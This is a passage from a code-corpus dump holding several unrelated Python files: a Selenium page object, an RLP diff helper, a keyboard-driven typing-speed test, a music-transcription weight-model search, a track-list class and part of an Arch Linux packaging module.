'//*[@id=\"querytype\"]/div/ul/li')\n# # 单个项的试题个数,相对路径,单个\n# _locator_item_number = (By.XPATH,'./div/span[2]')\n# # 题型名 相对路径\n# _locator_item_name = (By.XPATH,'./div/span[1]')\n# # 查看更多按钮\n# _locator_list_more_less = (By.XPATH,'//*[@id=\"querytype\"]/div/div/a')\n#\n# def click_more_less(self):\n# we = self.driver.find_element(*self._locator_list_more_less)\n# we.click()\n# time.sleep(2)\n# print(self.driver.find_element(*self._locator_list_more_less).text)\n# return we.text\n#\n# def get_more_less_text(self):\n# return self.driver.find_element(*self._locator_list_more_less).text\n#\n# def __init__(self, webdriver_: webdriver.Chrome):\n# self.driver = webdriver_\n#\n# # if webdriver_.current_url() != 'http://39.98.72.185:11001/qti/question/list':\n# # raise ValueError()\n#\n# self._is_collapsed = False\n# self._type_we_list = self.driver.find_elements(*self._locator_list)\n#\n# def click_collapse(self):\n# we = self.driver.find_element(*self._locator_collapse_btn)\n# we.click()\n# time.sleep(2) # 等待动画完毕\n# self._is_collapsed = not self._is_collapsed\n# return self._is_collapsed\n#\n# def is_collapsed(self):\n# return self._is_collapsed\n#\n# def click_item(self,type_name_):\n# '''\n# 点击列表项,条件是可见,且名字相同\n# :param type_name:问题名\n# :return: True表示 有该名字的项,且能点击\n# '''\n# if self.is_collapsed():\n# self.click_collapse()\n# type_list = self.get_list()\n# pos = [t['name'] for t in type_list].index(type_name_)\n#\n# if pos > 4 and self.get_more_less_text() == '查看更多':\n# self.click_more_less()\n#\n# we = self._type_we_list[pos]\n# we.click()\n#\n# def get_item_number(self,type_name):\n# '''\n# :param type_name: 题型名\n# :return: 返回值是数字的字符串形式,不应该用int()转整形,由test去转\n# '''\n# item_list = self.get_list()\n# for item in item_list:\n# if item['name'] == type_name:\n# return item['number']\n#\n# def get_list(self):\n# '''\n# 如果无数据,则返回[],必要条件是可见\n# :return: [{'name': '简单题', 'number': '12'}] number是字符串,这里只返回页面最真实的数据\n# '''\n# value = []\n# if self.get_more_less_text() == '查看更多':\n# self.click_more_less()\n#\n# we_list = self._type_we_list\n# for we in we_list:\n# name = we.find_element(*self._locator_item_name).text\n# number = we.find_element(*self._locator_item_number).text\n# print(u'name: {:10} number:{:4}'.format(name,number))\n# value.append({'name':name,'number':value})\n#\n# wes = self.driver.find_elements(By.XPATH,'//*[@id=\"diff\"]//*[@class=\"bank-right-li-item\"]')\n# print(str(len(wes)))\n# return value\n\nclass QuestionBankPage:\n\n # def __init__(self, driver_):\n # self.driver = driver\n # self.url = url\n # self.timeout = 20\n # login_page = LoginPage(self.driver)\n # login_page.login_success()\n # time.sleep(5)\n # self.driver.get(self.url)\n # time.sleep(2)\n # #self.side_bar_type = QuestionTypeSideBar(self.driver)\n # self.side_bar = SideBar(self.driver)\n\n # 定位符: 题型 难度 分类 标签\n _locator_side_bar_type_list = (By.XPATH, '//*[@id=\"querytype\"]//*[@class=\"bank-right-li-item\"]')\n _locator_side_bar_level_list = (By.XPATH, '//*[@id=\"diff\"]//*[@class=\"bank-right-li-item\"]')\n _locator_side_bar_category_list = (By.XPATH, '//*[@id=\"ban-class\"]//*[@class=\"bank-right-li-item\"]')\n _locator_side_bar_tag_list = (By.XPATH, '//*[@id=\"ban-title\"]//*[@class=\"bank-right-li-item\"]')\n\n def __init__(self, driver_: webdriver.Chrome):\n \"\"\"\n 初始化页面右侧的所有数据,包括项的名字和数量,以及对应项的webelement\n :param driver_:\n \"\"\"\n self._driver = driver_\n driver_.get('http://39.98.72.185:11001/qti/question/list')\n # 展开题型\n self.click_flexible()\n # webelement列表\n self._we_side_bar_type_list = driver_.find_elements(*self._locator_side_bar_type_list)\n self._we_side_bar_level_list = driver_.find_elements(*self._locator_side_bar_level_list)\n self._we_side_bar_category_list = driver_.find_elements(*self._locator_side_bar_category_list)\n self._we_side_bar_tag_list = driver_.find_elements(*self._locator_side_bar_tag_list)\n\n locator_name = (By.XPATH, './span[1]')\n locator_amount = (By.XPATH, './span[2]')\n\n # 题型列表{'type':选择题,'amount':12}\n self.side_bar_type_data_list = [{'name': we.find_element(*locator_name).text,\n 'amount': int(we.find_element(*locator_amount).text)}\n for we in self._we_side_bar_type_list]\n self.side_bar_level_data_list = [{'name': we.find_element(*locator_name).text,\n 'amount': int(we.find_element(*locator_amount).text)}\n for we in self._we_side_bar_level_list]\n self.side_bar_category_data_list = [{'name': we.find_element(*locator_name).text,\n 'amount': int(we.find_element(*locator_amount).text)}\n for we in self._we_side_bar_category_list]\n self.side_bar_tag_data_list = [{'name': we.find_element(*locator_name).text,\n 'amount': int(we.find_element(*locator_amount).text)}\n for we in self._we_side_bar_tag_list]\n\n # 日期的自定义按钮\n _locator_top_date_custom = (By.XPATH, '//*[@id=\"bank-top-box\"]/ul/li[5]/div/p[5]')\n\n def click_top_date(self, type_):\n \"\"\"\n 设置查询的时间,按界面顺序从1编号\n :param type_: 编号数字\n :param from_:\n :param to_:\n :return:\n \"\"\"\n if type_ == 5:\n self._driver.find_element(*self._locator_top_date_custom).click()\n\n _locator_top_query_reset = (By.XPATH, '//*[@id=\"bodycontent\"]/div/div[2]/form/div[2]/div[1]/div[3]')\n\n def click_top_reset(self):\n \"\"\"\n 点击顶部的查询条件重置按钮\n :return:\n \"\"\"\n self._driver.find_element(*self._locator_top_query_reset).click()\n\n # 题型的除标签外的信息\n _locator_question_meta = (By.XPATH, '//*[@id=\"questionList\"]/li[1]/div/div[2]/div[1]/span[1]')\n\n _locator_question_list = (By.XPATH, '//*[@id=\"questionList\"]/li')\n\n def get_question_meta_data_list(self):\n \"\"\"\n 获取当前页面当前条件的所有试题的meta信息,比如题型,难度,分值等\n :return:\n \"\"\"\n data_list = []\n we_question_list = self._driver.find_elements(*self._locator_question_list)\n count = 0\n while True:\n for we in we_question_list[count:]:\n data = {}\n question_id = we.get_attribute('data-key')\n data['id'] = question_id\n meta = we.find_elements(By.XPATH, './div/div[2]/div[1]/span')\n # 使用innerText避免展开试题\n data['type'] = meta[0].get_attribute(\"innerText\").strip()\n data['points'] = meta[1].get_attribute(\"innerText\").strip()\n data['level'] = meta[2].get_attribute(\"innerText\").strip()\n if len(meta) == 4:\n data['category'] = meta[3].get_attribute(\"innerText\").strip()\n else:\n data['category'] = ''\n # //*[@id=\"questionList\"]/li[49]/div/div[2]/div[2]/span 标签\n we_tag_list = we.find_elements(By.XPATH, './div/div[2]/div[2]/span')\n if len(we_tag_list) != 0:\n data['tag'] = [we.get_attribute('innerText').strip() for we in we_tag_list]\n else:\n data['tag'] = []\n data_list.append(data)\n if len(we_question_list) == self.get_question_count():\n break\n count = len(we_question_list)\n self._driver.execute_script('window.scroll(0,document.body.scrollHeight)')\n we_question_list = self._driver.find_elements(*self._locator_question_list)\n\n return data_list\n\n _locator_search = (By.XPATH, '//*[@id=\"bodycontent\"]/div/div[2]/form/div[2]/div[1]/div[2]')\n\n def click_left_search(self):\n \"\"\"\n 点击顶部左边的搜索按钮\n :return:\n \"\"\"\n self._driver.find_element(*self._locator_search).click()\n # WebDriverWait(self._driver, 10).until(EC.presence_of_element_located((By.XPATH, r'//ul[2]/li/span')))\n\n _locator_question_count = (By.ID, 'dataCount')\n\n def get_question_count(self):\n \"\"\"\n 获取搜索的结果,注意:查询到结果,才更新当前的数量,所以,要等结果返回\n :return: 整数\n \"\"\"\n WebDriverWait(self._driver, 5).until(lambda _driver: self._driver.find_element(*self._locator_question_count).text != '')\n return int(self._driver.find_element(*self._locator_question_count).text)\n\n def click_right_side_item(self, key_, value_):\n \"\"\"\n 点击右侧的查询条件项\n :param key_: 项目类型,比如题型,难度\n :param value_: 对应项目的具体名字,比如多选题\n :return:\n \"\"\"\n if key_ == '题型':\n if self.get_flexible_text() == '查看更多':\n self.click_flexible()\n for i, v in enumerate(self.side_bar_type_data_list):\n if v['name'] == value_:\n self._we_side_bar_type_list[i].click()\n break\n elif key_ == '试题难度':\n for i, v in enumerate(self.side_bar_level_data_list):\n if v['name'] == value_:\n self._we_side_bar_level_list[i].click()\n break\n elif key_ == '类别':\n for i, v in enumerate(self.side_bar_category_data_list):\n if v['name'] == value_:\n self._we_side_bar_category_list[i].click()\n break\n elif key_ == '标签':\n for i, v in enumerate(self.side_bar_tag_data_list):\n if v['name'] == value_:\n self._we_side_bar_tag_list[i].click()\n break\n time.sleep(1)\n\n # 查看更多按钮\n _locator_type_list_flexible = (By.XPATH, '//*[@id=\"querytype\"]/div/div/a')\n\n def click_flexible(self):\n \"\"\"\n 点击查看更多按钮\n :return:\n \"\"\"\n # 等待loading 遮罩消失,才可以点击“more”按钮\n WebDriverWait(self._driver,5).until(EC.invisibility_of_element_located((By.XPATH,'/html/body/div[2]')))\n self._driver.find_element(*self._locator_type_list_flexible).click()\n\n # 等待动画效果结束\n WebDriverWait(self._driver, 2).until(EC.visibility_of_all_elements_located(self._locator_type_list_flexible))\n\n def get_flexible_text(self):\n \"\"\"\n 获取查看更多按钮的文字 transition-screen-wrapper\n :return:\n \"\"\"\n return self._driver.find_element(*self._locator_type_list_flexible).text\n\n\n \n\n\n","sub_path":"pages/question_bank_page.py","file_name":"question_bank_page.py","file_ext":"py","file_size_in_byte":12208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"412660545","text":"from __future__ import absolute_import\n\nimport rlp\n\nfrom eth_utils import (\n to_tuple,\n)\n\n\n@to_tuple\ndef diff_rlp_object(left, right):\n if left != right:\n rlp_type = type(left)\n\n for field_name, field_type in rlp_type.fields:\n left_value = getattr(left, field_name)\n right_value = getattr(right, field_name)\n if isinstance(field_type, type) and issubclass(field_type, rlp.Serializable):\n sub_diff = diff_rlp_object(left_value, right_value)\n for sub_field_name, sub_left_value, sub_right_value in sub_diff:\n yield (\n \"{0}.{1}\".format(field_name, sub_field_name),\n sub_left_value,\n sub_right_value,\n )\n elif isinstance(field_type, (rlp.sedes.List, rlp.sedes.CountableList)):\n if tuple(left_value) != tuple(right_value):\n yield (\n field_name,\n left_value,\n right_value,\n )\n elif left_value != right_value:\n yield (\n field_name,\n left_value,\n right_value,\n )\n else:\n continue\n","sub_path":"evm/utils/rlp.py","file_name":"rlp.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"71631321","text":"# ToDo: Don't count incorrectly typed words\r\n\r\nimport keyboard as kb, win32api, winsound, random, time, tkinter as tk, winsound as ws\r\nfrom pynput import keyboard\r\n\r\ndef pickagain():\r\n global noofwords\r\n noofwords = int(input('No. of words? [Between 10 and 10000]: '))\r\n if not noofwords in range(10, 10001):\r\n print('Sorry ,invalid range. Pick again...\\n')\r\n pickagain()\r\n else:\r\n play()\r\n\r\ndef play():\r\n global i, incorrectct, remaining, starttime, endtime, incorrectchars\r\n specialchars = [\r\n 'alt_l', 'backspace', 'correct', 'ctrl_l', 'delete', 'end', 'enter', 'esc', 'home',\\\r\n 'insert', 'num_lock', 'page_down', 'page_up', 'print_screen', 'shift', 'shift_r',\\\r\n 'tab', 'f1', 'f12', 'f2', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9', 'f10', 'f11', '_',\r\n 'left', 'up', 'down', 'right', 'media_play_pause', 'media_volume_mute', 'media_volume_up', 'media_volume_down', None, 'cmd', 'caps_lock'\r\n '!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '~', '`', '_', '+', '-', '+', '|', '\\\\', '/', '?', '\"', \"'\", '<', '>', ',', '.', ';', ':',\\\r\n '[', ']', '{', '}'\r\n ]\r\n\r\n with open(r\"D:\\AI Training Text Files\\Project Gutenberg's Frankenstein, by Mary Wollstonecraft (Godwin) Shelley.txt\", 'r', encoding = 'utf-8-sig') as f:\r\n content = f.read()\r\n alphacontent = ''.join(x for x in content if x.isalpha() or x == ' ' or x == '\\n').replace('\\n', ' ')\r\n words = alphacontent.split()\r\n\r\n words = [i for i in words if len(i) > 4]\r\n random.shuffle(words)\r\n out = ' _ '.join(words[:noofwords])\r\n\r\n sentence = out\r\n sentence = sentence.replace('\\n', ' ')\r\n print(sentence+'\\n')\r\n\r\n sentence = sentence.replace('_ ', '')\r\n words = sentence.split(' ')\r\n remainingwords = sentence.split()\r\n rawin = []\r\n remaining = list(sentence)\r\n incorrectct = 0\r\n incorrectchars = []\r\n\r\n i = remaining[0]\r\n wordtimes = []\r\n\r\n def on_press(key):\r\n global i, incorrectct, remaining, starttime, endtime\r\n try:\r\n k = key.char # single-char keys\r\n except:\r\n k = key.name # other keys\r\n if key == keyboard.Key.space:\r\n k = ' '\r\n rawin.append(key)\r\n if k == i: # correct key entered\r\n del remaining[0]\r\n if len(remaining) == len(sentence)-1:\r\n starttime = time.time()\r\n if k == ' ':\r\n wordtimes.append(time.time())\r\n del words[0]\r\n\r\n else: # incorrect key entered\r\n if not k in specialchars:\r\n incorrectct += 1\r\n incorrectchars.append(k)\r\n print('Incorrect \"'+k+'\" instead of '+i)\r\n try:\r\n i = remaining[0]\r\n except:\r\n i = sentence[-1]\r\n\r\n if remaining == [] or k == keyboard.Key.esc:\r\n wordtimes.append(time.time())\r\n endtime = time.time()\r\n words.pop()\r\n return False # stop listener\r\n\r\n listener = keyboard.Listener(on_press=on_press)\r\n listener.start() # start to listen on a separate thread\r\n listener.join() # remove if main thread is polling self.keys\r\n\r\n precision = 5\r\n worddurations = [(wordtimes[n]-wordtimes[n-1]) for n in range(1, len(wordtimes))]\r\n #print(worddurations)\r\n del worddurations[0] #Don't count duration to type the first word [discard this value]\r\n avgwordduration = sum(worddurations)/len(worddurations)\r\n\r\n TIME = endtime - starttime\r\n sTIME = (str(TIME).split('.')[0]+'.'+str(TIME).split('.')[1][:precision])\r\n\r\n CPS = len(sentence)/float(sTIME)\r\n sCPS = (str(CPS).split('.')[0]+'.'+str(CPS).split('.')[1][:precision])\r\n\r\n CPM = float(CPS)*60\r\n sCPM = (str(CPM).split('.')[0]+'.'+str(CPM).split('.')[1][:precision])\r\n\r\n WPM = CPM/5\r\n sWPM = (str(WPM).split('.')[0]+'.'+str(WPM).split('.')[1][:precision])\r\n\r\n print('\\n\\n')\r\n print('CPS:', sCPS)\r\n print('CPM:', sCPM)\r\n print('TIME TAKEN:', sTIME, 's')\r\n print('Incorrect attempts:', incorrectct)\r\n print('WPM', sWPM)\r\n\r\n print()\r\n print('Incorrect chars:', incorrectchars)\r\n\r\n #print(locals().keys())\r\n\r\npickagain()\r\n","sub_path":"Typing Test.py","file_name":"Typing Test.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"555912610","text":"import os\nimport sys\nsys.path.insert(0, os.path.dirname(os.path.abspath(__file__)) + '/../..')\n\nfrom dataMaps import DataMaps,convert_note_to_time, align_matrix\nfrom eval_utils import compute_eval_metrics_frame, compute_eval_metrics_note\nfrom mlm_training.model import Model, make_model_param\nfrom mlm_training.utils import safe_mkdir\nfrom decode import decode, pad_x\nfrom create_weight_data import get_weight_data\nfrom train_weight_model import train_model\n\nimport glob\nimport pickle\nimport warnings\nimport gzip\n\nimport tensorflow as tf\nimport pretty_midi as pm\nimport numpy as np\n\nmodel_dict = {'model' : None,\n 'sess' : None}\n\nglobal_params = {'model_out' : None,\n 'step' : None,\n 'acoustic' : None,\n 'early_exit' : None}\n\ndata_dict = {'gt' : None,\n 'beam' : None,\n 'valid' : None}\n\ndef load_data_info(gt=None, beam=None, valid=None, model_path=None, n_hidden=256, step=None, model_out=\".\",\n acoustic='kelz', early_exit=0.001, diagRNN=False):\n global global_params\n global data_dict\n global model_dict\n\n if gt is not None:\n with gzip.open(gt, \"rb\") as file:\n data_dict['gt'] = pickle.load(file)\n\n if beam is not None:\n with gzip.open(beam, \"rb\") as file:\n data_dict['beam'] = pickle.load(file)\n\n data_dict['valid'] = valid\n\n model_param = make_model_param()\n model_param['n_hidden'] = n_hidden\n model_param['n_steps'] = 1 # To generate 1 step at a time\n if diagRNN:\n model_param['cell_type'] = \"diagLSTM\"\n\n # Build model object\n model_dict['model'] = Model(model_param)\n model_dict['sess'],_ = model_dict['model'].load(model_path, model_path=model_path)\n\n global_params['step'] = step\n global_params['model_out'] = model_out\n global_params['acoustic'] = acoustic\n global_params['early_exit'] = early_exit\n\n\nmost_recent_model = None\n\ndef get_most_recent_model():\n global most_recent_model\n return most_recent_model\n\n\ndef weight_search(params, num=0, verbose=False):\n print(params)\n sys.stdout.flush()\n\n gt = params[0]\n min_diff = params[1]\n history = int(params[2])\n num_layers = int(params[3])\n is_weight = params[4]\n features = params[5]\n\n history_context = 0\n prior_context = 0\n\n if len(params) > 6:\n history_context = params[6]\n prior_context = params[7]\n\n use_lstm = True\n if len(params) > 8:\n use_lstm = params[8]\n\n warnings.filterwarnings(\"ignore\", message=\"tick should be an int.\")\n\n max_len = 30\n section = [0, max_len]\n\n note_range = [21,109]\n note_min = note_range[0]\n note_max = note_range[1]\n\n # Load model\n model = model_dict['model']\n sess = model_dict['sess']\n\n # Get weight_model data\n pkl = data_dict['gt' if gt else 'beam']\n\n X = pkl['X']\n Y = pkl['Y']\n D = pkl['D']\n max_history = pkl['history']\n no_mlm = pkl['no_mlm'] if 'no_mlm' in pkl else False\n\n if np.max(D) < min_diff:\n print(\"No training data generated\")\n sys.stdout.flush()\n return 0.0\n\n data_points = np.where(D > min_diff)\n data_features = []\n\n if history > 0:\n data_features.extend(range(max_history - history, max_history))\n\n if features:\n data_features.extend(range(max_history, len(X[0]) - 2))\n\n data_features.append(-2)\n\n if use_lstm:\n data_features.append(-1)\n\n X = X[:, data_features]\n\n if prior_context + history_context > 0:\n X_new = np.zeros((X.shape[0], X.shape[1] + prior_context * 4 + 2 * history_context * history))\n\n for i in range(int(X.shape[0] / 88)):\n x_frame = X[88 * i : 88 * (i + 1), :]\n\n X_new[88 * i : 88 * (i + 1), :] = pad_x(x_frame, x_frame[:, -2], x_frame[:, -1], x_frame[:, :history], history, history_context, prior_context)\n\n X = X_new\n\n X = X[data_points]\n Y = Y[data_points]\n\n if len(X) == 0:\n print(\"No training data generated\")\n sys.stdout.flush()\n return 0.0\n\n # Train weight model\n print(\"Training weight model\")\n sys.stdout.flush()\n layers = []\n for i in range(num_layers):\n layers.append(5)\n\n weight_model = train_model(X, Y, layers=layers, weight=is_weight)\n\n global most_recent_model\n most_recent_model = {'model' : weight_model,\n 'history' : history,\n 'features' : features,\n 'weight' : is_weight,\n 'history_context' : history_context,\n 'prior_context' : prior_context,\n 'use_lstm' : use_lstm,\n 'no_mlm' : no_mlm}\n\n weight_model_name = \"weight_model.\"\n weight_model_name += \"gt\" if gt else \"b10\"\n weight_model_name += \"_md\" + str(min_diff)\n weight_model_name += \"_h\" + str(history)\n weight_model_name += \"_l\" + str(num_layers)\n if features:\n weight_model_name += \"_f\"\n weight_model_name += \"_hc\" + str(history_context)\n weight_model_name += \"_pc\" + str(prior_context)\n if not use_lstm:\n weight_model_name += \"_noLSTM\"\n if no_mlm:\n weight_model_name += \"_noMLM\"\n weight_model_name += \"_weight\" if is_weight else \"_prior\"\n weight_model_name += \".\" + global_params['step'] + \".\" + str(num) + \".pkl\"\n\n # Write out weight model\n with open(os.path.join(global_params['model_out'], weight_model_name), \"wb\") as file:\n pickle.dump(most_recent_model, file)\n\n results = {}\n frames = np.zeros((0, 3))\n notes = np.zeros((0, 3))\n\n for filename in glob.glob(os.path.join(data_dict['valid'], \"*.mid\")):\n print(filename)\n sys.stdout.flush()\n\n data = DataMaps()\n data.make_from_file(filename,global_params['step'],section,acoustic_model=global_params['acoustic'])\n\n # Decode\n pr, priors, weights, combined_priors = decode(data.input, model, sess, branch_factor=5,\n beam_size=50, weight=[[0.8], [0.2]],\n out=None, hash_length=12, weight_model=weight_model,\n verbose=verbose, weight_model_dict=most_recent_model)\n\n if global_params['step'] != \"time\":\n pr = convert_note_to_time(pr,data.corresp,data.input_fs,max_len=max_len)\n\n data = DataMaps()\n data.make_from_file(filename, \"time\", section=section, acoustic_model=global_params['acoustic'])\n target = data.target\n\n #Evaluate\n P_f,R_f,F_f = compute_eval_metrics_frame(pr,target)\n P_n,R_n,F_n = compute_eval_metrics_note(pr,target,min_dur=0.05)\n\n print(f\"Frame P,R,F: {P_f:.3f},{R_f:.3f},{F_f:.3f}, Note P,R,F: {P_n:.3f},{R_n:.3f},{F_n:.3f}\")\n sys.stdout.flush()\n\n frames = np.vstack((frames, [P_f, R_f, F_f]))\n notes = np.vstack((notes, [P_n, R_n, F_n]))\n\n if F_n < global_params['early_exit']:\n print(\"Early stopping, F-measure too low.\")\n sys.stdout.flush()\n return 0.0\n\n P_f, R_f, F_f = np.mean(frames, axis=0)\n P_n, R_n, F_n = np.mean(notes, axis=0)\n\n print(f\"Frame P,R,F: {P_f:.3f},{R_f:.3f},{F_f:.3f}, Note P,R,F: {P_n:.3f},{R_n:.3f},{F_n:.3f}\")\n print(str(F_n) + \": \" + str(params))\n sys.stdout.flush()\n return -F_n\n","sub_path":"weight_models_old/optim/weight_search.py","file_name":"weight_search.py","file_ext":"py","file_size_in_byte":7274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"475737099","text":"import random\nfrom typing import Dict, List\n\nfrom src.music.track import Track\n\n\nclass TrackList:\n def __init__(self, config: Dict):\n \"\"\"\n Initializes a `TrackList` instance.\n\n The `config` parameter is expected to be a dictionary with the following keys:\n - \"name\": the name of the track list\n - \"directory\": the directory where the files for this track list are (Optional)\n - \"volume\": an integer between 0 (mute) and 100 (max) (Optional, default=100)\n - \"loop\": bool indicating whether to loop once all tracks have been played (Optional, default=True)\n - \"shuffle\": bool indicating whether to shuffle the tracks (Optional, default=True)\n - \"next\": name of the track list to play after this one finishes (Optional)\n - \"tracks\": a list of track configs. See `Track` class for more information.\n\n :param config: `dict`\n \"\"\"\n self.name = config[\"name\"]\n self.directory = config[\"directory\"] if \"directory\" in config else None\n self.volume = int(config[\"volume\"]) if \"volume\" in config else 100\n self.loop = config[\"loop\"] if \"loop\" in config else True\n self.shuffle = config[\"shuffle\"] if \"shuffle\" in config else True\n self.next = config[\"next\"] if \"next\" in config else None\n tracks = [Track(track_config) for track_config in config[\"tracks\"]]\n self._tracks = tuple(tracks) # immutable\n\n @property\n def tracks(self) -> List[Track]:\n \"\"\"\n Returns the tracks for this instance. This list is shuffled, if `shuffle` is set.\n \"\"\"\n tracks = list(self._tracks) # Copy since random will shuffle in place\n if self.shuffle:\n random.shuffle(tracks)\n return tracks\n\n def __eq__(self, other):\n if isinstance(other, TrackList):\n attrs_are_the_same = (\n self.name == other.name\n and self.directory == other.directory\n and self.loop == other.loop\n and self.shuffle == other.shuffle\n and self.volume == other.volume\n and self.next == other.next\n )\n if not attrs_are_the_same:\n return False\n if len(self._tracks) != len(other._tracks):\n return False\n for my_track, other_track in zip(self._tracks, other._tracks):\n if my_track != other_track:\n return False\n return True\n return False\n","sub_path":"src/music/track_list.py","file_name":"track_list.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"89500185","text":"# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright © 2012, RedJack, LLC.\n# All rights reserved.\n#\n# Please see the COPYING file in this distribution for license details.\n# ----------------------------------------------------------------------\n\nfrom __future__ import absolute_import\n\nimport collections\nimport os\nimport os.path\n\nimport buzzy.build\nimport buzzy.build.autotools\nimport buzzy.build.cmake\nimport buzzy.build.none\nimport buzzy.build.python\nimport buzzy.config\nimport buzzy.recipe\nimport buzzy.source\nimport buzzy.source.download\nimport buzzy.source.git\nimport buzzy.utils\nfrom buzzy.errors import BuzzyError\nfrom buzzy.log import log\n\nfrom buzzy.distro.arch.pkgbuild import *\n\n\narch = buzzy.utils.get_arch_from_uname()\npkgdest = None\nrepo_db = None\nrepo_files_db = None\n\n\n#-----------------------------------------------------------------------\n# General package functions\n\ndef is_native_package(package_name):\n return buzzy.utils.if_run([\"pacman\", \"-Si\", package_name])\n\n\n#-----------------------------------------------------------------------\n# Arch packages\n\nclass Arch(buzzy.yaml.Fields):\n def fields(self):\n yield \"native\", {\"default\": None}\n yield \"python\", {\"default\": None}\n\nclass Recipe(buzzy.recipe.Recipe):\n def fields(self):\n yield \"arch\", {\"custom\": Arch, \"default\": {}}\n\n\n#-----------------------------------------------------------------------\n# Native packages are easy\n\nclass NativePackage(buzzy.recipe.Package):\n def package_spec(self):\n return \"%s=%s\" % (self.package_name, self.recipe.version)\n\n def built(self):\n # Native packages are always built.\n return True\n\n def installed(self):\n return buzzy.utils.if_run([\"pacman\", \"-T\", self.package_spec()])\n\n def perform_build(self):\n # Nothing to build for a native package\n pass\n\n def perform_install(self):\n buzzy.utils.sudo([\"pacman\", \"-S\", \"--noconfirm\", self.package_spec()])\n\n\n#-----------------------------------------------------------------------\n# Built packages are hard\n\n# The directory that we build a package in.\ndef build_path(package_name):\n return os.path.join(buzzy.config.env.build_dir, package_name, \"build\")\n\nclass BuiltPackage(buzzy.recipe.Package):\n def __init__(self, package_name, recipe, tags, dep_tag):\n super(BuiltPackage, self).__init__(package_name, recipe, tags, dep_tag)\n self.build_path = build_path(package_name)\n self.pkgbuild = Pkgbuild(self)\n self.pkgbuild.add_producer(ArchPackageMetadata())\n self.pkgbuild.add_producer(ArchLicenseChecker())\n for source in recipe.sources:\n self.pkgbuild.add_producer(source)\n self.pkgbuild.add_producer(recipe.build)\n\n def package_filename(self):\n return \"%s-%s-%s-%s.pkg.tar.xz\" % \\\n (self.package_name, self.recipe.version, self.recipe.revision, arch)\n\n def package_path(self):\n return os.path.join(pkgdest, self.package_filename())\n\n def package_spec(self):\n return \"%s=%s-%s\" % \\\n (self.package_name, self.recipe.version, self.recipe.revision)\n\n def built(self):\n result = os.path.exists(self.package_path())\n if result:\n log(0, \"[%s] Package is already built\" % self.full_name)\n return result\n\n def installed(self):\n result = buzzy.utils.if_run([\"pacman\", \"-T\", self.package_spec()])\n if result:\n log(0, \"[%s] Package is already installed\" % self.full_name)\n return result\n\n def clean_build_path(self):\n buzzy.utils.rmtree(os.path.join(self.build_path, \"src\"))\n buzzy.utils.rm(os.path.join(self.build_path, self.package_filename()))\n\n def make_pkgbuild(self):\n self.pkgbuild.make(self)\n self.pkgbuild.write()\n\n def perform_build(self):\n log(0, \"[%s] Cleaning build directory\" % self.full_name)\n self.clean_build_path()\n log(0, \"[%s] Creating PKGBUILD file\" % self.full_name)\n self.make_pkgbuild()\n log(0, \"[%s] Building package\" % self.full_name)\n buzzy.utils.run([\"makepkg\", \"-s\", \"-f\"], cwd=self.build_path)\n log(0, \"[%s] Updating repository database\" % self.full_name)\n buzzy.utils.run([\"repo-add\", \"-d\", repo_db,\n self.package_path()])\n buzzy.utils.run([\"repo-add\", \"-d\", \"-f\", repo_files_db,\n self.package_path()])\n\n def perform_install(self):\n buzzy.utils.sudo([\"pacman\", \"-U\", \"--noconfirm\",\n self.package_path()])\n\n\n#-----------------------------------------------------------------------\n# Builders\n\ndef create_compiled_package(recipe):\n # For \"normal\" compiled packages, we trim off any subdirectories in the\n # recipe name to get the package name.\n package_name = os.path.basename(recipe.recipe_name)\n\n # The package is native if the recipe explicitly says so, or if there's a\n # package in the local Arch package database with the package's name. (The\n # recipe also override this check if there's a conflicting name.)\n\n if recipe.arch.native is None:\n # Nothing explicit in the recipe; check whether there's an Arch package\n # with this name.\n native = is_native_package(package_name)\n\n elif not recipe.arch.native:\n # Recipe explicitly says the package is not native.\n native = False\n\n elif isinstance(recipe.arch.native, str):\n # Recipe explicitly says the package is native.\n native = True\n package_name = recipe.arch.native\n\n else:\n raise BuzzyError(\"Unexpected value for arch.native in %s\" %\n recipe.recipe_name)\n\n # Instantiate the native or built package class.\n if native:\n return NativePackage(package_name, recipe, [\"default\"])\n else:\n return BuiltPackage(package_name, recipe, [\"default\"])\n\n\nclass Autotools(buzzy.build.autotools.Autotools):\n def create_packages(self, recipe):\n return [create_compiled_package(recipe)]\n\n def make_pkgbuild(self, package, pkgbuild):\n pkgbuild.list(\"options\").append(\"!libtool\")\n\n build = pkgbuild.code(\"build\")\n build.append(BUILD_CONFIGURE, './configure --prefix=/usr')\n build.append(BUILD_MAKE, 'make')\n\n package = pkgbuild.code(\"package\")\n package.append(INSTALL_STAGE, 'make DESTDIR=\"$pkgdir\" install')\n\n\nclass Cmake(buzzy.build.cmake.Cmake):\n def create_packages(self, recipe):\n return [create_compiled_package(recipe)]\n\n def make_pkgbuild(self, package, pkgbuild):\n pkgbuild.list(\"makedepends\").append(\"cmake\")\n\n build = pkgbuild.code(\"build\")\n build.append(BUILD_CONFIGURE, \"\"\"\n cmake_src=$(pwd)\n mkdir -p \"${startdir}/cmake-build\"\n pushd \"${startdir}/cmake-build\"\n cmake -DCMAKE_INSTALL_PREFIX=/usr \"${cmake_src}\"\n popd\n \"\"\")\n\n build.append(BUILD_MAKE, \"\"\"\n pushd \"${startdir}/cmake-build\"\n make\n popd\n \"\"\")\n\n package = pkgbuild.code(\"package\")\n package.append(INSTALL_STAGE, \"\"\"\n pushd \"${startdir}/cmake-build\"\n make DESTDIR=\"$pkgdir\" install\n popd\n \"\"\")\n\ndef python_prefix(python_version):\n if python_version == 2:\n return \"python2\"\n else:\n return \"python\"\n\n\ndef create_python_package(recipe, python_version):\n # For Python packages, we trim off any subdirectories in the recipe name to\n # get the package name's suffix. (The prefix is always \"python2-\" or\n # \"python-\".)os.path.basename(recipe.recipe_name)\n prefix = python_prefix(python_version)\n package_suffix = os.path.basename(recipe.recipe_name)\n package_name = \"%s-%s\" % (prefix, package_suffix)\n\n # The package is native if the recipe explicitly says so, or if there's a\n 